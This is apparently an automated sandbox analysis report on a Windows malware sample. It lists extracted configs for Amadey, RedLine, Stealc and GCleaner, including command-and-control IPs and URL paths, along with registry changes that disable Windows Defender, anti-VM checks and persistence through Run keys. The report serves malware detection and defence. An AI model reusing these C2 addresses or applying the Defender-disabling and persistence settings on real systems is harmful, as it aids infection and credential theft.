Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2025 15:51
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-en
General
-
Target
random.exe
-
Size
938KB
-
MD5
82770f4f16aafa62bf019d0e2944023c
-
SHA1
1a5de9e7ff040d5826f667772b968c3fef511a1d
-
SHA256
3102530afdedd09fe1f4900a923940a685f225a9b403c82b5ad6ef7387645a58
-
SHA512
cbeea51108249e8450ad07a24797b1fc37ddb9cabd44995560dec23c7827b5a77e6e84cc0a870ed41667ffafdcd6750c32fe92b217527c2f98e46990fd0f8667
-
SSDEEP
24576:8qDEvCTbMWu7rQYlBQcBiT6rprG8ay8F:8TvC/MTQYxsWR7ay8
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
gcleaner
185.156.73.23
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/1616-1940-0x00000000008B0000-0x0000000000B5C000-memory.dmp healer behavioral2/memory/1616-1938-0x00000000008B0000-0x0000000000B5C000-memory.dmp healer behavioral2/memory/1616-2653-0x00000000008B0000-0x0000000000B5C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/2260-94-0x0000000000C70000-0x00000000010D0000-memory.dmp family_sectoprat behavioral2/memory/2260-95-0x0000000000C70000-0x00000000010D0000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58560b85f7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5360676733.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 659a886552.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b797487b2e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 750bf746aa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ PVXMYCPFZGQON1HINXNB5GKTAJ2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 1 3628 powershell.exe 180 2768 powershell.exe 181 5164 powershell.exe 189 1296 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2768 powershell.exe 5164 powershell.exe 1296 powershell.exe 3628 powershell.exe 3916 powershell.exe 6072 powershell.exe 4264 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 15 2412 skotes.exe 15 2412 skotes.exe 15 2412 skotes.exe 15 2412 skotes.exe 15 2412 skotes.exe 33 4384 b797487b2e.exe 1 3628 powershell.exe 180 2768 powershell.exe 181 5164 powershell.exe 189 1296 powershell.exe 5 2412 skotes.exe 5 2412 skotes.exe 7 2620 750bf746aa.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 750bf746aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 659a886552.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 659a886552.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5360676733.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PVXMYCPFZGQON1HINXNB5GKTAJ2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 750bf746aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b797487b2e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b797487b2e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58560b85f7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5360676733.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PVXMYCPFZGQON1HINXNB5GKTAJ2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58560b85f7.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 17 IoCs
pid Process 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 2412 skotes.exe 2620 750bf746aa.exe 2260 5360676733.exe 3228 659a886552.exe 4384 b797487b2e.exe 3236 58560b85f7.exe 2460 cc13325a1d.exe 4036 skotes.exe 2168 4c1ad737af.exe 2568 deb10d5c60.exe 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 1972 PVXMYCPFZGQON1HINXNB5GKTAJ2.exe 4000 TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE 4928 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe 2032 483d2fa8a0d53818306efeb32d3.exe 6128 skotes.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine b797487b2e.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine PVXMYCPFZGQON1HINXNB5GKTAJ2.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 5360676733.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 659a886552.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 58560b85f7.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine 750bf746aa.exe Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE Key opened \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\Software\Wine skotes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1070162021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b797487b2e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1070157001\\b797487b2e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\58560b85f7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1070158001\\58560b85f7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc13325a1d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1070159001\\cc13325a1d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4c1ad737af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1070160001\\4c1ad737af.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\deb10d5c60.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1070161101\\deb10d5c60.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000d000000023dbc-490.dat autoit_exe behavioral2/files/0x000c000000023dbf-1121.dat autoit_exe behavioral2/files/0x0007000000023e57-1599.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 2412 skotes.exe 2620 750bf746aa.exe 2260 5360676733.exe 3228 659a886552.exe 4384 b797487b2e.exe 3236 58560b85f7.exe 4036 skotes.exe 1972 PVXMYCPFZGQON1HINXNB5GKTAJ2.exe 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 4000 TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE 4928 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe 2032 483d2fa8a0d53818306efeb32d3.exe 6128 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5348 2620 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 47 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 750bf746aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5360676733.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage cc13325a1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language deb10d5c60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 659a886552.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cc13325a1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c1ad737af.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 58560b85f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language cc13325a1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PVXMYCPFZGQON1HINXNB5GKTAJ2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b797487b2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5116 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2380 taskkill.exe 2000 taskkill.exe 4224 taskkill.exe 3152 taskkill.exe 3228 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3932017190-1449707826-1445630-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4584 schtasks.exe 4300 schtasks.exe 2676 schtasks.exe 5340 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3628 powershell.exe 3628 powershell.exe 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 2412 skotes.exe 2412 skotes.exe 2620 750bf746aa.exe 2620 750bf746aa.exe 2260 5360676733.exe 2260 5360676733.exe 3228 659a886552.exe 3228 659a886552.exe 3228 659a886552.exe 3228 659a886552.exe 3228 659a886552.exe 3228 659a886552.exe 2260 5360676733.exe 4384 b797487b2e.exe 4384 b797487b2e.exe 2260 5360676733.exe 4384 b797487b2e.exe 4384 b797487b2e.exe 4384 b797487b2e.exe 4384 b797487b2e.exe 3236 58560b85f7.exe 3236 58560b85f7.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 4036 skotes.exe 4036 skotes.exe 2768 powershell.exe 2768 powershell.exe 2768 powershell.exe 5164 powershell.exe 5164 powershell.exe 5164 powershell.exe 1972 PVXMYCPFZGQON1HINXNB5GKTAJ2.exe 1972 PVXMYCPFZGQON1HINXNB5GKTAJ2.exe 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 3916 powershell.exe 3916 powershell.exe 3916 powershell.exe 4000 TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE 4000 TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE 6072 powershell.exe 6072 powershell.exe 4928 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe 4928 0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe 6072 powershell.exe 4264 powershell.exe 4264 powershell.exe 4264 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 2032 483d2fa8a0d53818306efeb32d3.exe 2032 483d2fa8a0d53818306efeb32d3.exe 6128 skotes.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 2260 5360676733.exe Token: SeDebugPrivilege 2380 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 4224 taskkill.exe Token: SeDebugPrivilege 3152 taskkill.exe Token: SeDebugPrivilege 3228 taskkill.exe Token: SeDebugPrivilege 4624 firefox.exe Token: SeDebugPrivilege 4624 firefox.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 5164 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeDebugPrivilege 1616 Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 784 random.exe 784 random.exe 784 random.exe 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2168 4c1ad737af.exe 2168 4c1ad737af.exe 2168 4c1ad737af.exe 2568 deb10d5c60.exe 2568 deb10d5c60.exe 2568 deb10d5c60.exe -
Suspicious use of SendNotifyMessage 40 IoCs
